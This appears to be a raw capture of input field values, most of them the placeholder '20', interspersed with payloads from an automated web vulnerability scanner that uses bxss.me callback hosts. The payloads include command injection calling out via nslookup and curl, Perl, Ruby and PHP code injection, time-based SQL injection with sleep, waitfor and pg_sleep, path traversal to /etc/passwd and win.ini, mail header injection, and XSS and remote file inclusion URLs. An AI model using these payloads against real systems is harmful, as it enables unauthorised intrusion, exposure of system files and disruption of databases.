20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
1zXLBznb2O
20
WOZLRVUL
20
20
20
20
20
20
20
20
20
20
20
${9999257+9999760}
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20&n969874=v908479
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20%0abcc:074625.142431-38256.142431.61592.19585.2@bxss.me
20
20
20
20
20
20
20
20
20
20
'.gethostbyname(lc('hitzb'.'nnkrzcbic7380.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(89).chr(118).chr(87).'
20
20
20
20
20
20
".gethostbyname(lc("hitfb"."ephxxsqx3f9e5.bxss.me."))."A".chr(67).chr(hex("58")).chr(100).chr(84).chr(102).chr(74)."
20
to@example.com>%0d%0abcc:074625.142431-38260.142431.61592.19585.2@bxss.me
20
20
20
20
12345'"\'\");|]*%00{%0d%0a%bf%27'💡
20
20
)
20
20
response.write(9230494*9634840)
20
20
20
20
20
20
20
20
20
20
'+response.write(9230494*9634840)+'
HttP://bxss.me/t/xss.html?%00
!(()&&!|*|*|
20
20
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
20
xfs.bxss.me
20
20
20
20
20
bxss.me/t/xss.html?%00
^(#$!@#$)(()))******
"+response.write(9230494*9634840)+"
20
20
20
20
20
20
20
20
20
20
"+"A".concat(70-3).concat(22*4).concat(117).concat(73).concat(97).concat(84)+(require"socket"
Socket.gethostbyname("hitsi"+"drskbkypac62d.bxss.me.")[3].to_s)+"
20
20
20
20
20
20
20
20
'+'A'.concat(70-3).concat(22*4).concat(115).concat(65).concat(108).concat(85)+(require'socket'
Socket.gethostbyname('hityt'+'qzrnwabb42e86.bxss.me.')[3].to_s)+'
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
../../../../../../../../../../../../../../etc/passwd
20
20
20
20
20
'"
20
../../../../../../../../../../../../../../windows/win.ini
20
20
20
20
file:///etc/passwd
'"()
20
20
20
20
20
../20
20'&&sleep(27*1000)*dfrlbu&&'
20
20
20
20
20"&&sleep(27*1000)*ihnifd&&"
20
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
20
20'||sleep(27*1000)*tbzzfc||'
20
';print(md5(31337));$a='
20
20"||sleep(27*1000)*sujfgr||"
";print(md5(31337));$a="
20
20
20
${@print(md5(31337))}
20
20
20
${@print(md5(31337))}\
20
20
20
20
'.print(md5(31337)).'
20
20
20
20
20
20
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
echo licrln$()\ ahrziw\nz^xyu||a #' &echo licrln$()\ ahrziw\nz^xyu||a #|" &echo licrln$()\ ahrziw\nz^xyu||a #
20
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
&echo dcxxsy$()\ sjhkcr\nz^xyu||a #' &echo dcxxsy$()\ sjhkcr\nz^xyu||a #|" &echo dcxxsy$()\ sjhkcr\nz^xyu||a #
20
Http://bxss.me/t/fit.txt
|echo asmboo$()\ okwjzk\nz^xyu||a #' |echo asmboo$()\ okwjzk\nz^xyu||a #|" |echo asmboo$()\ okwjzk\nz^xyu||a #
http://bxss.me/t/fit.txt%3F.jpg
20
20
(nslookup -q=cname hitvwtsnuniirebeb4.bxss.me||curl hitvwtsnuniirebeb4.bxss.me))
20
$(nslookup -q=cname hiteokflqrhzlec1a2.bxss.me||curl hiteokflqrhzlec1a2.bxss.me)
20
/etc/shells
20
c:/windows/win.ini
20
bxss.me
20
&nslookup -q=cname hitjhhetrhqtvbbefe.bxss.me&'\"`0&nslookup -q=cname hitjhhetrhqtvbbefe.bxss.me&`'
20
20
20
&(nslookup -q=cname hitpvljejqjwe3f3bf.bxss.me||curl hitpvljejqjwe3f3bf.bxss.me)&'\"`0&(nslookup -q=cname hitpvljejqjwe3f3bf.bxss.me||curl hitpvljejqjwe3f3bf.bxss.me)&`'
20
|(nslookup -q=cname hitqoptsrtwzkb42c0.bxss.me||curl hitqoptsrtwzkb42c0.bxss.me)
20
`(nslookup -q=cname hittusylziyxobea02.bxss.me||curl hittusylziyxobea02.bxss.me)`
20
;(nslookup -q=cname hitxmlonpdkjl35345.bxss.me||curl hitxmlonpdkjl35345.bxss.me)|(nslookup -q=cname hitxmlonpdkjl35345.bxss.me||curl hitxmlonpdkjl35345.bxss.me)&(nslookup -q=cname hitxmlonpdkjl35345.bxss.me||curl hitxmlonpdkjl35345.bxss.me)
20
20
20
20
20
20
20
20
20
20'"()&%IhBN(9467)
20
20
'"()&%IhBN(9197)
20
209826622
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
BPRkAXOP
-1 OR 2+680-680-1=0+0+0+1 --
-1 OR 2+682-682-1=0+0+0+1
-1' OR 2+315-315-1=0+0+0+1 --
-1' OR 2+310-310-1=0+0+0+1 or 'iTEhJaRO'='
-1" OR 2+719-719-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
ncSlPRWE'; waitfor delay '0:0:15' --
-5 OR 704=(SELECT 704 FROM PG_SLEEP(15))--
-5) OR 479=(SELECT 479 FROM PG_SLEEP(15))--
-1)) OR 519=(SELECT 519 FROM PG_SLEEP(15))--
SVZ1APX2' OR 306=(SELECT 306 FROM PG_SLEEP(15))--
UXMaYBRY') OR 813=(SELECT 813 FROM PG_SLEEP(15))--
VCJO1lou')) OR 565=(SELECT 565 FROM PG_SLEEP(15))--
20*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
20'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
1????%2527%2522
@@p3FjU
20
20
20
20